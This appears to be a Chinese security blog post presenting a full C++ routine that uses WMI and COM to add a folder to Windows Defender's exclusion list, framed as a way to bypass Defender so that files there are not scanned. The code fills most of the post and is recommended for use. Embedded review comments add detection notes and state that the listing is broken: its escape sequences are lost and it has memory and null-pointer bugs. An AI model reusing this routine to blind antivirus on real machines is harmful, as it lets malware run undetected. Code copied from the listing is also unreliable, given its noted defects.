利用 WMI 和 COM 绕过 Windows Defender
2023-03-14 22:33:56 时间
先知上曾经有人发过一篇利用windows defender排除项来免杀的文章,文章地址:
https://xz.aliyun.com/t/10317
而这个过程我们也可以使用代码来进行实现
// Adds one path to Windows Defender's ExclusionPath list through WMI:
// namespace ROOT\Microsoft\Windows\Defender, class MSFT_MpPreference,
// method "Add", with the single-element string array built below as the
// ExclusionPath argument. Returns 1 when ExecMethod succeeds and 0 on any
// failure; each failure path prints a "[-] ..." line and releases whatever
// was acquired up to that point.
//
// Defender-side notes: this is an ordinary configuration change to the
// anti-malware platform, not an exploit. It needs an elevated token, it is
// refused while Tamper Protection is enabled (on recent builds that cover
// exclusions — confirm against the target build), and the result is visible
// afterwards to `Get-MpPreference` and as a configuration-change event in the
// Defender operational log (event ID 5007 — confirm). Alerting on new
// exclusion entries is the corresponding detection.
//
// NOTE(review): the listing as reproduced here has lost its escape
// sequences — the "\n" inside the wprintf strings shows as a raw line break
// and the backslashes in the namespace path are single — so it does not
// compile verbatim.
INT AddDefenderExclussion(WCHAR* exclpath)
{
/*
WCHAR path[] = L"C:\Temp";
INT res = AddDefenderExclussion(path);
if (!res)
{
::wprintf(L"[-] AddDefenderExclussion has failed
");
}
*/
HRESULT hr;
// Per-call COM setup. CoInitializeSecurity can only succeed once per
// process: if the caller has already set process-wide security it returns
// RPC_E_TOO_LATE and this function gives up even though the WMI connection
// would have worked.
hr = CoInitializeEx(0, COINIT_MULTITHREADED);
if (FAILED(hr))
{
::wprintf(L"[-] CoInitializeEx has failed
");
return 0;
}
hr = CoInitializeSecurity(
NULL,
-1,
NULL,
NULL,
RPC_C_AUTHN_LEVEL_DEFAULT,
RPC_C_IMP_LEVEL_IMPERSONATE,
NULL,
EOAC_NONE,
NULL
);
if (FAILED(hr))
{
::wprintf(L"[-] CoInitializeSecurity has failed
");
CoUninitialize();
return 0;
}
IWbemLocator* pLoc = 0;
hr = CoCreateInstance(CLSID_WbemLocator, 0, CLSCTX_INPROC_SERVER, IID_IWbemLocator, (LPVOID*)&pLoc);
if (FAILED(hr))
{
::wprintf(L"[-] CoCreateInstance has failed
");
CoUninitialize();
return 0;
}
IWbemServices* pSvc = 0;
// Local connection with the caller's own token (NULL user/password); the
// Defender namespace rejects this unless that token is elevated.
hr = pLoc->ConnectServer(BSTR(L"ROOT\Microsoft\Windows\Defender"), NULL, NULL, 0, NULL, 0, 0, &pSvc);
if (FAILED(hr))
{
::wprintf(L"[-] ConnectServer has failed
");
pLoc->Release();
CoUninitialize();
return 0;
}
// Standard WMI-client proxy security: NTLM auth, per-call authentication,
// impersonation so the provider runs the request as the caller.
hr = CoSetProxyBlanket(
pSvc,
RPC_C_AUTHN_WINNT,
RPC_C_AUTHZ_NONE,
NULL,
RPC_C_AUTHN_LEVEL_CALL,
RPC_C_IMP_LEVEL_IMPERSONATE,
NULL,
EOAC_NONE
);
if (FAILED(hr))
{
::wprintf(L"[-] CoSetProxyBlanket has failed
");
pSvc->Release();
pLoc->Release();
CoUninitialize();
return 0;
}
IWbemClassObject* pClass = 0;
BSTR Clname = BSTR(L"MSFT_MpPreference");
// NOTE(review): the HRESULT of GetObject is never checked; if it fails
// pClass stays 0 and the GetMethod call below dereferences a null pointer.
hr = pSvc->GetObject(Clname, 0, NULL, &pClass, NULL);
BSTR MethodName = BSTR(L"Add");
IWbemClassObject* pInSignature = 0;
hr = pClass->GetMethod(MethodName, 0, &pInSignature, NULL);
if (FAILED(hr))
{
::wprintf(L"[-] GetMethod has failed
");
// NOTE(review): pInSignature is still 0 here (GetMethod failed), so this
// Release() is a call through a null pointer; the same pattern recurs in
// the SpawnInstance failure path below.
pInSignature->Release();
pClass->Release();
pSvc->Release();
pLoc->Release();
CoUninitialize();
return 0;
}
IWbemClassObject* pClassInstance = NULL;
hr = pInSignature->SpawnInstance(0, &pClassInstance);
if (FAILED(hr))
{
::wprintf(L"[-] SpawnInstance has failed
");
pClassInstance->Release();
pInSignature->Release();
pClass->Release();
pSvc->Release();
pLoc->Release();
CoUninitialize();
return 0;
}
// Create an array
// ExclusionPath is a string array in the WMI schema, so even a single path
// has to be wrapped in a one-element SAFEARRAY of BSTR. The return value of
// SafeArrayCreate is not checked.
SAFEARRAYBOUND rgsaBounds[1];
rgsaBounds[0].cElements = 1;
rgsaBounds[0].lLbound = 0;
SAFEARRAY* psaStrings;
psaStrings = SafeArrayCreate(VT_BSTR, 1, rgsaBounds);
// Add a string to the array
VARIANT vString;
VariantInit(&vString);
V_VT(&vString) = VT_BSTR;
// NOTE(review): _bstr_t(exclpath) is a temporary; its BSTR is freed when the
// temporary is destroyed at the end of this statement, so the VARIANT holds
// a dangling pointer before SafeArrayPutElement copies it, and VariantClear
// below frees that memory a second time. The VARIANT needs an owned BSTR.
V_BSTR(&vString) = _bstr_t(exclpath);
LONG lArrayIndex = 0;
SafeArrayPutElement(psaStrings, &lArrayIndex, V_BSTR(&vString));
VariantClear(&vString);
// variant array
VARIANT vStringList;
VariantInit(&vStringList);
V_VT(&vStringList) = VT_ARRAY | VT_BSTR;
// The SAFEARRAY is now owned by vStringList; VariantClear on it releases
// the array and its elements on every later path.
V_ARRAY(&vStringList) = psaStrings;
// Store the value for the in parameters
hr = pClassInstance->Put(L"ExclusionPath", 0, &vStringList, CIM_STRING|CIM_FLAG_ARRAY);
if (FAILED(hr))
{
::wprintf(L"[-] Put has failed %x
", hr);
VariantClear(&vStringList);
pClassInstance->Release();
pInSignature->Release();
pClass->Release();
pSvc->Release();
pLoc->Release();
CoUninitialize();
return 0;
}
// NOTE(review): pOutParams is declared but never used — ExecMethod is given
// NULL for the out-parameter object, so the method's own ReturnValue is
// never inspected. A successful HRESULT only means the call was dispatched,
// not that Defender accepted the exclusion (e.g. when Tamper Protection
// refuses it).
IWbemClassObject* pOutParams = NULL;
hr = pSvc->ExecMethod(Clname, MethodName, 0, NULL, pClassInstance, NULL, NULL);
if (FAILED(hr))
{
::wprintf(L"[-] ExecMethod has failed %x
", hr);
VariantClear(&vStringList);
pClassInstance->Release();
pInSignature->Release();
pClass->Release();
pSvc->Release();
pLoc->Release();
CoUninitialize();
return 0;
}
// Success-path cleanup (releases pLoc before pSvc, the reverse of the
// failure paths; the order is harmless since each is an independent
// reference).
VariantClear(&vStringList);
pClassInstance->Release();
pInSignature->Release();
pClass->Release();
pLoc->Release();
pSvc->Release();
CoUninitialize();
return 1;
}
代码来自:https://stmxcsr.com/micro/
除此之外,网站还有很多其他的功能实现,推荐阅读使用。
请严格遵守网络安全法相关条例!此分享主要用于学习,切勿走上违法犯罪的不归路,一切后果自付!